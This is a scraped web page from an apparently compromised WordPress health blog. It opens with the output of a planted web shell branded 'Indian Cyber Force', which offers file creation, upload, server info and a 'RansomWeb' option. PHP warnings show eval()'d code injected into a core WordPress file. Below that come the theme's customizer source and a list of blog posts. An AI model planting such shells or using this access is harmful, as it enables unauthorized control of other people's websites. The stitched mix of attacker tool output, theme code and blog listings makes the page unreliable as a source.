Warning: Constant WP_USE_THEMES already defined in css.zip#index.php on line 74
  • Home (current)
  • वर्तमान निदेशक => /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/
  • सूचना एवं अपलोड
    Info Server
Indian Cyber Force
Folders रचयन्तु सञ्चिकां रचयन्तु RansomWeb लॉगआउट

Warning: Undefined array key "बहिः गच्छतु" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 136

Warning: Undefined array key "aksi" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 140

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 159

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 181
Current File : /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/customizer.php
<?php
/**
 * Graceful Theme Customizer
 *
 * @package Graceful
 */

/*
** Register Theme Customizer
*/
function graceful_customize_register( $wp_customize ) {

	// Customizer Sanitization Functions
	require get_template_directory().'/inc/customizer/customizer-sanitization.php';

	// Theme Customizer Sections
	require get_template_directory().'/inc/customizer/theme-options/about.php';
	require get_template_directory().'/inc/customizer/theme-options/colors.php';
	require get_template_directory().'/inc/customizer/theme-options/basic-layouts.php';
	require get_template_directory().'/inc/customizer/theme-options/site-identity.php';
	require get_template_directory().'/inc/customizer/theme-options/navigation.php';
	require get_template_directory().'/inc/customizer/theme-options/post-slider.php';
	require get_template_directory().'/inc/customizer/theme-options/blogs-page.php';
	require get_template_directory().'/inc/customizer/theme-options/single-page.php';
	require get_template_directory().'/inc/customizer/theme-options/social-media.php';
	require get_template_directory().'/inc/customizer/theme-options/site-footer.php';
	require get_template_directory().'/inc/customizer/theme-options/loading-animation.php';
	
}
add_action( 'customize_register', 'graceful_customize_register' );


/*
** To preview changes instantly bind the js handlers
*/
function graceful_customize_preview_js() {
	wp_enqueue_script( 'graceful-customizer-previews', get_theme_file_uri( '/inc/customizer/customizer-ui/js/customizer-previews.js' ), array( 'customize-preview' ), '1.0', true );
}
add_action( 'customize_preview_init', 'graceful_customize_preview_js' );

/*
** Load logic dynamically for the customizers controls section.
*/
function graceful_panels_js() {
	wp_enqueue_style( 'fontawesome', get_theme_file_uri( '/assets/css/font-awesome.css' ) );
	wp_enqueue_style( 'graceful-customize-style', get_theme_file_uri( '/inc/customizer/customizer-ui/css/custom-ui.css' ) );
	wp_enqueue_script( 'graceful-customizer-controls', get_theme_file_uri( '/inc/customizer/customizer-ui/js/customizer-controls.js' ), array(), '1.0', true );
}
add_action( 'customize_controls_enqueue_scripts', 'graceful_panels_js' );

// Load default values for customizer
require get_template_directory().'/inc/customizer/customizer-default.php';
wellwisehub – Page 6 Skip to content
wellwisehub

Latest Articles

  • Blog

    Effective Ways to Help Someone on Their Journey to Overcome Drug Addiction

  • Blog

    Duration of Oxycodone in Your System: Insights into Metabolism, Detection, and Withdrawal

  • Blog

    Struggling with Bedroom Performance? Here’s How to Improve

  • Blog

    Navigating Sobriety: The Advantages of Crafting a Recovery Plan

  • Blog

    Challenging Widespread Myths About Tea Drinking in Modern Times

  • Blog

    The Ultimate Resource for Achieving Glass Skin

  • Blog

    How CBD Can Support Smoking Cessation and Reduce Addiction

  • Blog

    Seeking Medical Guidance: 7 Essential Steps to Take After Asbestos Exposure

  • Blog

    Essential Factors Behind Alzheimer’s Disease You Should Be Aware Of

  • Blog

    Signs It’s Time to Explore Intensive Counseling

 Older Posts
Newer Posts 

Recent Posts

Recent Comments

Graceful Theme by Optima Themes